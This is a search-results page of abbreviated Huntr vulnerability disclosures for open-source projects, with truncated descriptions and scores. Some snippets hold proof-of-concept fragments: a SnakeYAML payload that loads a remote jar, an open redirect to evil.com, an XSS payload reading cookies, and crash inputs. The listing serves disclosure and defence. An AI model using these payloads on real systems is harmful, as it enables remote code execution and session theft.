Lucene search
K
HuntrMost viewed

4072 matches found

Huntr
Huntr
added 2022/03/14 10:17 a.m.12 views

? before the @ sign allows one to bypass whitelists

Description ? before the @ sign in HTTP URLs allows one to bypass whitelists Proof of Concept Convince NodeJS HTTP client to make a request to 127.0.0.1 bypassing a google.com whitelist. const parse = require'parse-url' const http = require'http' const url = parse"http://[email protected]" if...

1AI score
Exploits0
Huntr
Huntr
added 2022/03/10 6:22 p.m.12 views

SSL certificate verification disabled

Description This report is strange, partially because the existence of this code has been acknowledged without any alarm about its security implications, and also because a pull request that would fix the vulnerability opened as a bug patch has been open for over two years! Having SSL certificate...

1.5AI score
Exploits0References1
Huntr
Huntr
added 2022/02/20 7:41 p.m.12 views

Heap-based Buffer Overflow in john

Description For PEM plugin, the length of the ciphertext is not properly checked. Then the ciphertext is copied to a fixed length buffer. Creating a ciphertext with a larger length allow a heap overflow. Proof of Concept Using the following file pem.hash bash $ ./congigure -enable-asan; make -j4;...

7.9AI score
Exploits0
Huntr
Huntr
added 2022/02/20 4:15 p.m.12 views

Relative Path Traversal to Remote Code Execution

Description Pandora FMS v7.0NG.759 allows relative path traversal in File Manager where a privileged user could upload a .php file outside the intended images directory which is restricted to execute the .php file. The impact could lead to Remote Code Execution with running application privilege...

5.8CVSS2.9AI score0.01067EPSS
Exploits0References1
Huntr
Huntr
added 2022/02/15 11:46 a.m.12 views

Open Redirect in ikus060/rdiffweb

Description The application has an Open Redirect vulnerability because the data filtering process does not completely prevent attacks. Proof of Concept - Step 1: Visit https://rdiffweb-demo.ikus-soft.com/login/?redirect=//evil.com - Step 2: Login with valid account, you will be redirect to evil.c...

1.6AI score
Exploits0
Huntr
Huntr
added 2022/02/11 1:21 p.m.12 views

in liangliangyy/djangoblog

Description The application leaked emails of unvalidated users to anonymous user. Proof of Concept - Step 1: Go to http://127.0.0.1:8000/register and create account. After create success, you will receive URL like http://127.0.0.1:8000/account/result.html?type=register&id=4 - Step 2: Open another...

1AI score
Exploits0
Huntr
Huntr
added 2022/02/09 10:41 p.m.12 views

Heap-based Buffer Overflow in mruby/mruby

Description Heap Overflow occurs in mrbfsend. commit : d912b864df3199f2108601a0451532c587a5e830 Proof of Concept $ echo -ne "c2VuZCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2Vu ZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5k IgAAAAo=" | base64...

7.5CVSS0.01243EPSS
Exploits1
Huntr
Huntr
added 2022/02/08 4:1 a.m.12 views

Path Traversal in liukuo362573/yishaadmin

Description https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/DownloadFile" that allows downloading/deleting files without authentication. In addition, this endpoint has path traversal vulnerability that allows arbitrary file read/delete. Proof of Concept - using BurpSui...

1.1AI score
Exploits0
Huntr
Huntr
added 2022/02/04 4:44 p.m.12 views

Exposure of Sensitive Information to an Unauthorized Actor in cjferna/photo-services-mashup

Description Please enter a description of the vulnerability. Vulnerable URL: https://github.com/cjferna/Photo-Services-Mashup/blob/fdc12e0671e035bac00cc46ee67d456540444460/src/es/um/taw/rest/imagga/Imagga.java It contains sensitive API Keys and secret keys. Proof of Concept private final String U...

0.5AI score
Exploits0
Huntr
Huntr
added 2022/01/31 2:9 p.m.12 views

Command Injection in ibotpeaches/apktool

Description Arbitrary code execution when an APK is built with a malicious apktool.yml due to SnakeYAML's load function Proof of Concept 1: Modify apktool.yml somevar: !!javax.script.ScriptEngineManager !!java.net.URLClassLoader !!java.net.URL "http://127.0.0.1:8000/yaml-payload.jar" 2: Download...

0.2AI score
Exploits0
Huntr
Huntr
added 2022/01/30 2:41 a.m.12 views

Cross-site Scripting (XSS) - Stored in liangliangyy/djangoblog

Description Hi there, I would like to report a stored Cross Site Scripting vulnerability in djangoblog source code. Cross-site scripting also known as XSS is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allow...

0.8AI score
Exploits0References1
Huntr
Huntr
added 2022/01/27 2:45 a.m.12 views

Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat

Description Stored XSS is found in SettingsLive help configurationDepartments-Departments groups-edit When a user creates a new webhook under the NAME field and puts a payload constructor.constructor'alert1', the input gets stored, at user edit groupname , the payload gets executed. Proof of...

3.5CVSS0.00634EPSS
Exploits1References1
Huntr
Huntr
added 2022/01/24 5:18 a.m.12 views

Heap-based Buffer Overflow in gpac/gpac

Description Heap-based Buffer Overflow in gpac Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1659-g7d3281e88-master c 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929...

Exploits0
Huntr
Huntr
added 2022/01/11 3:0 a.m.12 views

Business Logic Errors in silverstripe/silverstripe-framework

Description SilverStripe Framework is vulnerable to Business Logic Errors in the Failed login count since that value can be a negative number. Proof of Concept 1.After login, go to Security page under the path /admin/security/ 2.Click on any member record 3.In the member edit form, enter a negati...

1.2AI score
Exploits0
Huntr
Huntr
added 2021/12/30 9:33 a.m.12 views

Heap-based Buffer Overflow in gpac/gpac

Description Heap-based Buffer Overflow SFSAddString at bifs/scriptdec.c:76 Proof of Concept POC1 is here. Result MP4Box -disox -ttxt -2 -dump-chap-ogg -dump-cover -drtp -bt -out /dev/null POC1 ··· 5 538135 abort ./source/gpac/bin/gcc/MP4Box -disox -ttxt -2 -dump-chap-ogg -dump-cover -drtp Bt...

1.2AI score
Exploits0
Huntr
Huntr
added 2021/12/23 7:7 a.m.12 views

Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Description CSRF on logout functionality. Attacker able to logout the user by sending malicious link Proof of Concept Impact This vulnerability is capable of logout the user session Note This is not an attack, it is a kind of annoyance to the user , though it is a valid csrf . By Using post metho...

0.7AI score
Exploits0
Huntr
Huntr
added 2021/12/22 6:32 a.m.12 views

Cross-Site Request Forgery (CSRF) in archivy/archivy

Title Missing CSRF token validation leads to note deletion. Summary Route /dataobj/delete/ is responsible for note deletion. Instead of POST it accepts GET and DELETE methods. @app.route"/dataobj/delete/", methods="DELETE", "GET" def deletedatadataobjid: try: data.deleteitemdataobjid except...

4.3CVSS1.6AI score0.00382EPSS
Exploits1
Huntr
Huntr
added 2021/12/22 12:51 a.m.12 views

Cross-Site Request Forgery (CSRF) in erudika/scoold

Description Hi there, I would like to report a CSRF vulnerability in erudika/scoold. This allows an attacker to change the current user question space or add them to default space against their will. Proof of Concept 1. Access scoold demo at https://pro.scoold.com/ and log in 2. Access this link...

0.5AI score
Exploits0
Huntr
Huntr
added 2021/12/20 8:14 p.m.12 views

Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Description coreBOS is vulnerable to Reflected Cross-Site Scripting in the advftcriteriagroups - advftcriteria parameters. Payload - Outside the JSON object. alertdocument.cookie - Inside the JSON object...

6.4AI score
Exploits0
Huntr
Huntr
added 2021/12/20 3:13 a.m.12 views

Cross-site Scripting (XSS) - Stored in friends-of-forkcms/fork-cms-module-commerce

Description In the admin section in Commerce - Shop settings - Stock statuses - Edit stock statuses one can add XSS payloads. After adding XSS payloads when a user is visiting Commerce - Shop settings - Stock statuses the JavaScript code will be run. Proof of Concept Go to Commerce - Shop setting...

0.8AI score
Exploits0
Huntr
Huntr
added 2021/12/10 4:6 a.m.12 views

in humhub/humhub

Description Hello guys, hope you are having an awesome day! 🤗 HumHub has a functionality for spaces where you define that only invited users will be able to join a space. Private spaces come with this option but you can also define it for public ones. While a user is creating a space, this user i...

6.7AI score
Exploits0
Huntr
Huntr
added 2021/12/06 6:22 p.m.12 views

Denial of Service in chatwoot/chatwoot

The extractreply function https://github.com/chatwoot/chatwoot/blob/a0ffefad717b632269883863c27242bb97d3b66d/app/presenters/mailpresenter.rbL105 is highly inefficient on HTML emails. A legitimate LinkedIn email has 20kb of HTML content which takes a minute or two to process through that function,...

6.6AI score
Exploits0
Huntr
Huntr
added 2021/12/06 2:25 p.m.12 views

Cross-site Scripting (XSS) - DOM in emoncms/emoncms

Description EmonCMS 10.9.19 has a DOM-XSS vulnerability that is executed when javascript code is injected as imported data. Proof of Concept 1 - login into the app and browse to the section Feeds Import Data 2 - add alert1,a or 1638807909,alert2 in the CSV area. Then click on one of the empty fie...

1.8AI score
Exploits0
Huntr
Huntr
added 2021/12/03 10:57 p.m.12 views

PHP Remote File Inclusion in crater-invoice/crater

Description No mime type restriction on file uploads, allowing an attacker to upload and execute arbitrary PHP code. Proof of Concept Login to the dashboard, preferably using your own localhost install. Go to "Expenses", "Settings Account" or "Settings Company". Upload any PHP file you want. Impa...

4.1AI score
Exploits0References1
Huntr
Huntr
added 2021/11/29 3:25 p.m.12 views

Cross-site Scripting (XSS) - Stored in zikula/core

Description In zikula/core cross site scripting vulnerability is present in block module title field Proof of Concept 1. login to the demo account 2. go to blocks https://demo.ziku.la/blocks/admin/view 3. Add payload in title field and save 4 payload = " Impact This vulnerability is capable of...

6.4AI score
Exploits0
Huntr
Huntr
added 2021/11/20 11:15 a.m.12 views

Cross-site Scripting (XSS) - Reflected in kunstmaan/kunstmaanbundlescms

Description In kunstmaan / kunstmaanbundlescms ,extra metadata in seo form is vulnerable to reflected cross site scripting. Proof of Concept 1. login to the demo account 2. go to pages --select any page to edit -- go to SEO --- 3. Add payload to extra meta data and click save and see the preview ...

1AI score
Exploits0
Huntr
Huntr
added 2021/11/19 4:20 p.m.12 views

in chatwoot/chatwoot

I'll explain it briefly: A contact is created with the email address "[email protected]" and we are writing about sensitive information. userIdentifer is required to be validated with hmac. Now a human, on the other side of the world, comes into the chat and is asked by the bot for his email...

0.4AI score
Exploits0
Huntr
Huntr
added 2021/11/19 2:14 a.m.12 views

Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk

Description Stored XSS via Markdown at Description or Comment of Ticket Detail When rendering to Markdown, the application does not filter and check the properties are valid, so when the user enters XSS it will render as XSS . Proof of Concept // PoC.req POST /tickets/submit/ HTTP/1.1 Host:...

6.8CVSS0.01354EPSS
Exploits1
Huntr
Huntr
added 2021/11/10 7:47 p.m.12 views

in cortezaproject/corteza-server

Description Hey, when I attempt to change the password after creating an account I noticed that you haven't kept any password boundary. You need to limit password length. Hashing a large amount of data can cause significant resource consumption on behalf of the server and would be an easy target...

7.1AI score
Exploits0References1
Huntr
Huntr
added 2021/11/06 8:39 p.m.12 views

Code Injection in tsolucio/corebos

Description The user can control a point and infuse arbitrary HTML code into a vulnerable web page. This vulnerability can have numerous results, like disclosure of a user’s session treats that might be utilized to impersonate the victim, or, more generally, it can permit the aggressor to alter t...

1.1AI score
Exploits0
Huntr
Huntr
added 2021/10/31 6:11 p.m.12 views

Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Description Hey corebos team, in the meanwhile I find another low level CSRF. attacker can activate/deactivate a Task of workflow with CSRF attack. Proof of Concept // PoC.html history.pushState'', '', '/'...

1.8AI score
Exploits0
Huntr
Huntr
added 2021/10/29 3:45 p.m.12 views

Business Logic Errors in pimcore/demo

Description There is no check over the number of items that a user can add to the cart. Adding a huge amount of items when updating the cart, causes the server to fail returning a 500 Internal Server Error. Proof of Concept Below POST request causes the server to fail adding 900000000 items of th...

7.1AI score
Exploits0References1
Huntr
Huntr
added 2021/10/23 1:34 p.m.12 views

Improper Privilege Management in shadow-maint/shadow

Description The su utility, if compiled with PAM support, uses waitpid internally to monitor its child process. It depends on the creation of zombie processes for proper monitoring, but the creation can be suppressed by ignoring the SIGCHLD signal see waitpid manual page. If su is spawned from a...

7.1AI score0.00279EPSS
Exploits0References1
Huntr
Huntr
added 2021/10/23 9:27 a.m.12 views

Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii

Description there is a CSRF on Run rules again action Proof of Concept // PoC.html history.pushState'', '', '/'...

6.8CVSS2.2AI score0.00536EPSS
Exploits1
Huntr
Huntr
added 2021/10/20 7:32 p.m.12 views

Cross-site Scripting (XSS) - Stored in rmuif/web

Description rmuif is vulnerable to XSS. It is possible to use tags in SVG content when uploading a profile picture. Proof of Concept SVG content: HTML alertdocument.domain; 1: Save the above content into an SVG file. 2: Access the settings page and upload this file as a profile picture. 3: Access...

0.6AI score
Exploits0References1
Huntr
Huntr
added 2021/10/18 4:56 a.m.12 views

Cross-site Scripting (XSS) - Reflected in admidio/admidio

Description Possible to perform reflected XSS by using double URL encoding when retrieving files Proof of Concept Trigger XSS via...

0.9AI score
Exploits0
Huntr
Huntr
added 2021/10/17 11:22 a.m.12 views

in microweber/microweber

Description For comments when the captcha is enable, the attacker can send many spam comments only with first correct captcha code, this means attacker only one time enter the captcha and then can use it for many many times and make damage on availability of system...

2.5AI score
Exploits0
Huntr
Huntr
added 2021/10/17 1:8 a.m.12 views

Cross-site Scripting (XSS) - Stored in openwhyd/openwhyd

Overview The openwhyd open-source application and openwhyd.org are vulnerable to a stored cross-site scripting vulnerability via user profiles. Malicious users can inject arbitrary javascript into the username setting on their profiles which, when visited by external users, would execute javascri...

0.4AI score
Exploits0
Huntr
Huntr
added 2021/10/16 7:53 p.m.12 views

in admidio/admidio

Description it can be possible to perform a clickjacking attack due to the lack of frame restrictions. The application does not set the response header X-Frame-Options: DENY. Proof of Concept Clickjack test page save the script as clickjacking .html and page will render in iframes Impact it is...

1.5AI score
Exploits0References1
Huntr
Huntr
added 2021/10/16 10:51 a.m.12 views

Cross-Site Request Forgery (CSRF) in kevinpapst/kimai2

Description kevinpapst / kimai delete functionality is vulnerable to Cross site request forgery csrf attack Proof of Concept // PoC.js 1. login to admin account https://www.kimai.org/demo/ 2. goto invoice -- go down to preview invoices -- click save all it will redirect to this page -...

1.3AI score
Exploits0References1
Huntr
Huntr
added 2021/10/13 3:44 p.m.12 views

in mostafa-samir/zip-local

Description zip-local is vulnerable to Arbitrary File Write via Archive Extraction Zip Slip. Proof of Concept // PoC.js var zipper = require'zip-local'; zipper.unzip"zipslip.zip", functionerror, unzipped if!error // extract to the current working directory unzipped.savenull, function ; var...

0.7AI score
Exploits0References1
Huntr
Huntr
added 2021/10/10 5:35 p.m.12 views

Cross-Site Request Forgery (CSRF) in namelessmc/nameless

Description Several endpoints are vulnerable to CSRF 1: module install /index.php?route=/panel/core/modules/&action=install 2: clear template cache /index.php?route=/panel/core/paneltemplates/&action=clearcache 3: install templates, activate template, deactivate template, delete template,...

1.1AI score
Exploits0
Huntr
Huntr
added 2021/10/09 7:27 p.m.12 views

in pixelfed/pixelfed

Description: There is no rate limit sent unlimited email victim or any email address. Proof of Concept: There is no rate limit return-password , attacker to send unlimited email to victim or any email address. Impact: Attacker can sent unlimited email to any mail address . Solution: Add 'throttle...

0.8AI score
Exploits0
Huntr
Huntr
added 2021/10/07 6:4 p.m.12 views

Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Description Hello, there is another CSRF vulnerability on your nice application on the following endpoint. /sales/deleteitem/saleid...

2AI score
Exploits0
Huntr
Huntr
added 2021/10/06 6:13 a.m.12 views

Heap-based Buffer Overflow in hoene/libmysofa

Description system : ubuntu 20.04 build command cd libmysofa mkdir build cd build CC=clang CXX=clang++ CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" cmake ../ make all run cmd ./mysofa2json -c ./heapoobreadmemcpy ./mysofa2json -c ./heapoobread Proof of Concept poc 1 :...

0.2AI score
Exploits0
Huntr
Huntr
added 2021/10/02 10:44 a.m.12 views

in cortezaproject/corteza-server

Set up the cortezaproject in your local machine. Steps: -------- 1. Create the account on corteza 2. Login using same credentails from chrome and firefox. 3. Change user password from chrome. 4. Perform any activity in Firefox the session is still valid. Mitigation: --------------- After changing...

1.3AI score
Exploits0References1
Huntr
Huntr
added 2021/10/01 6:23 p.m.12 views

Cross-Site Request Forgery (CSRF) in collectiveaccess/pawtucket2

Description The following endpoints are vulnerable to CSRF attacks via GET requests even though they use AJAX: 1: Delete lightbox 2: Delete comments 3: Create comments 4: Create comments on objects 5: Add items into lightbox 6: Delete items from lightbox Proof of Concept Copy and paste the...

0.5AI score
Exploits0
Huntr
Huntr
added 2021/09/30 3:10 p.m.12 views

Code Injection in yogeshojha/rengine

Description RCE via the YAML configuration of reNgine. In this configuration, the settings of the tools used in scans can be adapted. This functionality can be abused to executy arbitrary code. PoC In the yaml configuration of reNgine, edit the extensions field of dirfilesearch to make it look li...

0.7AI score
Exploits0
Huntr
Huntr
added 2021/09/29 1:17 a.m.12 views

Exposure of Sensitive Information to an Unauthorized Actor in blair2004/nexopos-4x

Description Unhandled exception leads to exposure of server side and sql query information. Proof of Concept 1. Go to demo page http://v4.nexopos.com and login using demo account 2. Go to Customer - Create coupon and try to create a coupon without entering coupon code leave it empty 3. See that t...

7.3AI score
Exploits0
Huntr
Huntr
added 2021/09/28 1:38 p.m.12 views

Open Redirect in fisharebest/webtrees

Description OpenRedirect at login with parameter &url= Proof of Concept // PoC.request POST /demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo HTTP/2 Host: dev.webtrees.net Cookie: Secure-WT-ID=ekks8678620p55do7do21jd4p1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.15; rv:93.0...

Exploits0
Total number of security vulnerabilities4072